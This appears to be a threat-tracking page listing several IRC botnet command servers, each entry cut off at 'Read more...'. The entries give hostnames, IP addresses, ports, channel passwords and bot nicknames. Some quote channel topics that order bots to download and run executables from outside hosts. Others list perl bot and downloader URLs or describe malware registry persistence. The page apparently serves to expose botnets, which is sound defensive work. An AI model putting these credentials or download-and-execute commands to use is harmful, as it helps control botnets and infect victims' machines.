jjjjjj.ahrampress.net(botnet hosted in China Beijing Chinanet Hebei Province Network)

Uncategorized

jjjjjj.ahrampress.net ip: 123.183.217.32 jjjjjj.ahrampress.net:6943 123.183.217.32 5943 123.183.217.32 6943 PASSWORD: eee Nick [N00_USA_XP_39922187] rssr SP2-917 * 0 :COMPUTERNAME Now talking in #j Channel: #j Topic is ‘.r.getfile -S|.r.getfile http://61.136.59.34/LWC/img/mheader.png C:radr.exe 1|.asc -S|.http http://61.136.59.34/LWC/dc0.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0Read more...

irc.racrew.info(linux perl bots hosted in United States Arkadelphia Ezclick.net Inc)

Uncategorized

irc conection: $servidor=’75.46.208.5′ unless $servidor; my $porta=’9191′; Channels: 5 channels formed Clients: I have 103 clients and 0 servers Local users: Current Local Users: 103 Max: 143 Global users: Current Global Users: 103 Max: 417 bot link : http://80.73.145.20/seguridad/c.txt downloader link: http://80.73.145.20/seguridad/ec.txt? rabot.txt: http://80.73.145.20/seguridad/rabot.txt infos about hosting: http://whois.domaintools.com/75.46.208.5

70.39.71.240(botnet hosted in United States Missoula Sharktech Internet Services)

Uncategorized

Remote Host Port Number 70.39.71.240 51987 NICK {New}[USA-1244024-XP] USER 8408605 “” “lol” :8408605 JOIN ##Crysis Registry Modifications * The newly created Registry Value is: o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + winlog = “%Temp%lsass.exe” so that lsass.exe runs every time Windows starts Memory Modifications * There was a new process created in the system: Process Name Process Filename MainRead more...

java.KUTLUFAMILY.COM(update)

Uncategorized

Remote Host Port Number 178.211.56.102 80 66.90.103.116 80 178.211.56.105 81 PASS sexy Resolved : [java.KUTLUFAMILY.COM] To [178.211.56.105] Resolved : [java.KUTLUFAMILY.COM] To [178.211.56.104] NICK cqdrrkewtnvc USER gazulycxeqrd “” “qzr” :gazulycxeqrd JOIN #3 PONG :irc.dal.net NICK [N00_USA_XP_7237251]` USER SP2-891 * 0 :COMPUTERNAME Now talking in #3 Topic On: [ #3 ] [ .flushdns |.down -S |.update -SRead more...

sohbet.az(botnet hosted in Germany Hetzner Online Ag)

Uncategorized

Remote Host Port Number 173.192.225.170 80 64.211.162.99 80 67.202.66.171 80 67.202.66.203 80 67.202.94.86 80 75.126.182.189 80 95.168.183.188 80 178.63.104.143 6667 NICK USA|51200 USER svkhl 0 0 :USA|51200 JOIN #Dos! USERHOST USA|51200 MODE USA|51200 -x+i PRIVMSG #Dos! :- shell – File opened: www.siber.gen.tr Registry Modifications * The following Registry Key was created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices * TheRead more...